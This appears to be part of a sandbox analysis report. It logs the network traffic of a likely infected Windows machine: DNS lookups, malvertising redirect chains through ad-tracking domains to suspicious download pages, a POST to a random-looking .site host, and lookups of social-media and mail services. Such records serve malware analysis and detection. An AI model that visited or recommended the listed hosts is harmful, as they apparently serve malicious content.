                                                                                          Date: Fri, 09 Jul 2021 23:15:08 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=emeltpd839ebulgtvjonlo9au7; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253175683; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          vexacion.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          Response
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          139.45.197.236
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://vexacion.com/afu.php?zoneid=1851513
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          GET /afu.php?zoneid=1851513 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378; syncedCookie=true
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:16:58 GMT
                                                                                          Content-Type: text/html; charset=utf8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 98113e683475f0a2c5d28f10e50b8116
                                                                                          Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:16:58 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:16:58 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://vexacion.com/?z=1851513&syncedCookie=false
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          POST /?z=1851513&syncedCookie=false HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1851513&var=1851513&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Content-Length: 540
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378; syncedCookie=true
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:16:59 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 8b382347c795606901bec59025e1bf7e
                                                                                          Link: <https://visit.fractalclick.com>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                          Referrer-Policy: no-referrer
                                                                                          Location: https://visit.fractalclick.com/JisNOc/?utm_source=3552&utm_campaign=7700576&clck=437504070291296917&sid=1851513
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:16:59 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:16:59 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          my.rtmark.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          Response
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          139.45.195.8
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 1215
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:16:59 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          visit.fractalclick.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          visit.fractalclick.com
                                                                                          IN A
                                                                                          Response
                                                                                          visit.fractalclick.com
                                                                                          IN A
                                                                                          104.26.10.210
                                                                                          visit.fractalclick.com
                                                                                          IN A
                                                                                          104.26.11.210
                                                                                          visit.fractalclick.com
                                                                                          IN A
                                                                                          172.67.69.8
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://visit.fractalclick.com/JisNOc/?utm_source=3552&utm_campaign=7700576&clck=437504070291296917&sid=1851513
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.26.10.210:443
                                                                                          Request
                                                                                          GET /JisNOc/?utm_source=3552&utm_campaign=7700576&clck=437504070291296917&sid=1851513 HTTP/2.0
                                                                                          host: visit.fractalclick.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: http://vexacion.com/afu.php?zoneid=1851513&var=1851513&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          date: Fri, 09 Jul 2021 23:16:59 GMT
                                                                                          content-type: text/html
                                                                                          location: https://runswiftintenselythefile.vip/Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513
                                                                                          cf-cache-status: DYNAMIC
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HXWJ7HdpozMTgyGU2dquwPASdQNUKNiDaC9DmA3GQckwbViCGChR2kk3T%2BaGEEocK41ReuqhZWBHd5qLb0Mwjz8M2%2BNm6MeiEh8ulBZ6cYntcjrGJl7rDINQgTqzpcIm4OZO"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5435fbb244162-HAM
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          runswiftintenselythefile.vip
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          runswiftintenselythefile.vip
                                                                                          IN A
                                                                                          Response
                                                                                          runswiftintenselythefile.vip
                                                                                          IN A
                                                                                          3.208.146.20
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://runswiftintenselythefile.vip/Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          3.208.146.20:443
                                                                                          Request
                                                                                          GET /Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1851513&var=1851513&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: runswiftintenselythefile.vip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:17:00 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: session=iRd9VxI3RpPm1uht2LxoCFvwLTLja_JV
                                                                                          Server: nginx
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          webjscontent.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          webjscontent.com
                                                                                          IN A
                                                                                          Response
                                                                                          webjscontent.com
                                                                                          IN A
                                                                                          104.26.11.220
                                                                                          webjscontent.com
                                                                                          IN A
                                                                                          104.26.10.220
                                                                                          webjscontent.com
                                                                                          IN A
                                                                                          172.67.73.103
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://webjscontent.com/dl.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.26.11.220:443
                                                                                          Request
                                                                                          GET /dl.min.js HTTP/2.0
                                                                                          host: webjscontent.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://runswiftintenselythefile.vip/Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:17:00 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          cf-cache-status: DYNAMIC
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TQC14ZzeTjTflbHkoP6qNHS%2BYNJAczrkW5T9mPH94v9M%2F3rrjaLkN9wsfknlboCXmWObjKrGVE7YRSs8%2BDLilydFRXzoHEC3UGWeGcGXAgPc4NwPtXE8wyUNPWIO"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c543642e454181-HAM
                                                                                          content-encoding: br
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://runswiftintenselythefile.vip/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          3.208.146.20:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: runswiftintenselythefile.vip
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Date: Fri, 09 Jul 2021 23:17:00 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 552
                                                                                          Connection: keep-alive
                                                                                          Server: nginx
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.71.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          Response
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          40.93.212.0
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          104.47.53.36
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          Response
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          104.47.53.36
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          IN A
                                                                                          40.93.212.0
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          accounts.snapchat.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          accounts.snapchat.com
                                                                                          IN A
                                                                                          Response
                                                                                          accounts.snapchat.com
                                                                                          IN CNAME
                                                                                          ghs.googlehosted.com
                                                                                          ghs.googlehosted.com
                                                                                          IN A
                                                                                          172.217.17.51
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.directdexchange.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.directdexchange.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.directdexchange.com
                                                                                          IN CNAME
                                                                                          directdexchange.com
                                                                                          directdexchange.com
                                                                                          IN A
                                                                                          35.201.70.46
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          35.201.70.46:80
                                                                                          Request
                                                                                          GET /jump/next.php?r=2087215 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.directdexchange.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Fri, 09 Jul 2021 23:20:58 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Content-Encoding: gzip
                                                                                          Via: 1.1 google
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.directdexchange.com/jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.4444983392895643&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref=
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          35.201.70.46:80
                                                                                          Request
                                                                                          GET /jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.4444983392895643&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref= HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.directdexchange.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Moved Temporarily
                                                                                          Server: openresty
                                                                                          Date: Fri, 09 Jul 2021 23:20:59 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Location: http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2Cg2Z_dhfjoGU3Bv-GH0dEdHP3xP.8ed%2CbvxNWSCgUX2wN0iJxBQyUR7vIyZ_vZhfkY7yYmMCVOCl_0vxaxm8G84oahCjKPLQCkXc_RzIT98c-OfvbZ6CEvtY8_4f1SZFLwJGsIuMwyOkMgUBwjuR7MbXQtJgx27mFJanPjuotJ19tvCCO2T-fvCavAni-lXbIpS3gk42R852nkWikVKrH-h9SNWVKt8VPUU6B-52qkMPRG3mI8S0EDVC5yCkaXL89E_HPhCDJMoHeXFCRG7ZJIYWX8AvRLpZXIkEe9ze7KIMXMftIlCVERO4ASt8bmsq0JdJ8pwzfrkDJa_XVqR6AcZKEpDwCPhyNGcDbIp2pC82RSvZN-kxdbAP1vb67GoUUoPrEFNAKY7azuuNDT66MjS4SS0kvWHlX36sIVjn1NDGEcFYuKnIXtknQAoXF-X7WdOvJ9K_K5dZWQlmmzWbMmV8caHkSv-6btiR4nkPQEI2D5p7hKq2OqBxjvYio8Ndn4i00OlGhMth2c64fdXQBM7X10HsBBu6
                                                                                          Via: 1.1 google
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2Cg2Z_dhfjoGU3Bv-GH0dEdHP3xP.8ed%2CbvxNWSCgUX2wN0iJxBQyUR7vIyZ_vZhfkY7yYmMCVOCl_0vxaxm8G84oahCjKPLQCkXc_RzIT98c-OfvbZ6CEvtY8_4f1SZFLwJGsIuMwyOkMgUBwjuR7MbXQtJgx27mFJanPjuotJ19tvCCO2T-fvCavAni-lXbIpS3gk42R852nkWikVKrH-h9SNWVKt8VPUU6B-52qkMPRG3mI8S0EDVC5yCkaXL89E_HPhCDJMoHeXFCRG7ZJIYWX8AvRLpZXIkEe9ze7KIMXMftIlCVERO4ASt8bmsq0JdJ8pwzfrkDJa_XVqR6AcZKEpDwCPhyNGcDbIp2pC82RSvZN-kxdbAP1vb67GoUUoPrEFNAKY7azuuNDT66MjS4SS0kvWHlX36sIVjn1NDGEcFYuKnIXtknQAoXF-X7WdOvJ9K_K5dZWQlmmzWbMmV8caHkSv-6btiR4nkPQEI2D5p7hKq2OqBxjvYio8Ndn4i00OlGhMth2c64fdXQBM7X10HsBBu6
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          35.201.70.46:80
                                                                                          Request
                                                                                          GET /script/i.php?stamat=m%7C%2C%2Cg2Z_dhfjoGU3Bv-GH0dEdHP3xP.8ed%2CbvxNWSCgUX2wN0iJxBQyUR7vIyZ_vZhfkY7yYmMCVOCl_0vxaxm8G84oahCjKPLQCkXc_RzIT98c-OfvbZ6CEvtY8_4f1SZFLwJGsIuMwyOkMgUBwjuR7MbXQtJgx27mFJanPjuotJ19tvCCO2T-fvCavAni-lXbIpS3gk42R852nkWikVKrH-h9SNWVKt8VPUU6B-52qkMPRG3mI8S0EDVC5yCkaXL89E_HPhCDJMoHeXFCRG7ZJIYWX8AvRLpZXIkEe9ze7KIMXMftIlCVERO4ASt8bmsq0JdJ8pwzfrkDJa_XVqR6AcZKEpDwCPhyNGcDbIp2pC82RSvZN-kxdbAP1vb67GoUUoPrEFNAKY7azuuNDT66MjS4SS0kvWHlX36sIVjn1NDGEcFYuKnIXtknQAoXF-X7WdOvJ9K_K5dZWQlmmzWbMmV8caHkSv-6btiR4nkPQEI2D5p7hKq2OqBxjvYio8Ndn4i00OlGhMth2c64fdXQBM7X10HsBBu6 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.directdexchange.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Moved Temporarily
                                                                                          Server: openresty
                                                                                          Date: Fri, 09 Jul 2021 23:20:59 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Location: https://dist.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Referrer-Policy: no-referrer
                                                                                          Via: 1.1 google
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          dist.acnav.online
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          dist.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          dist.acnav.online
                                                                                          IN CNAME
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://dist.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /?c=ac&subid=16258728592587707149156352085882481&cid=2087215 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: dist.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Location: https://www.acnav.online?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Vary: Accept
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 105
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.acnav.online
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          www.acnav.online
                                                                                          IN CNAME
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /?c=ac&subid=16258728592587707149156352085882481&cid=2087215 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
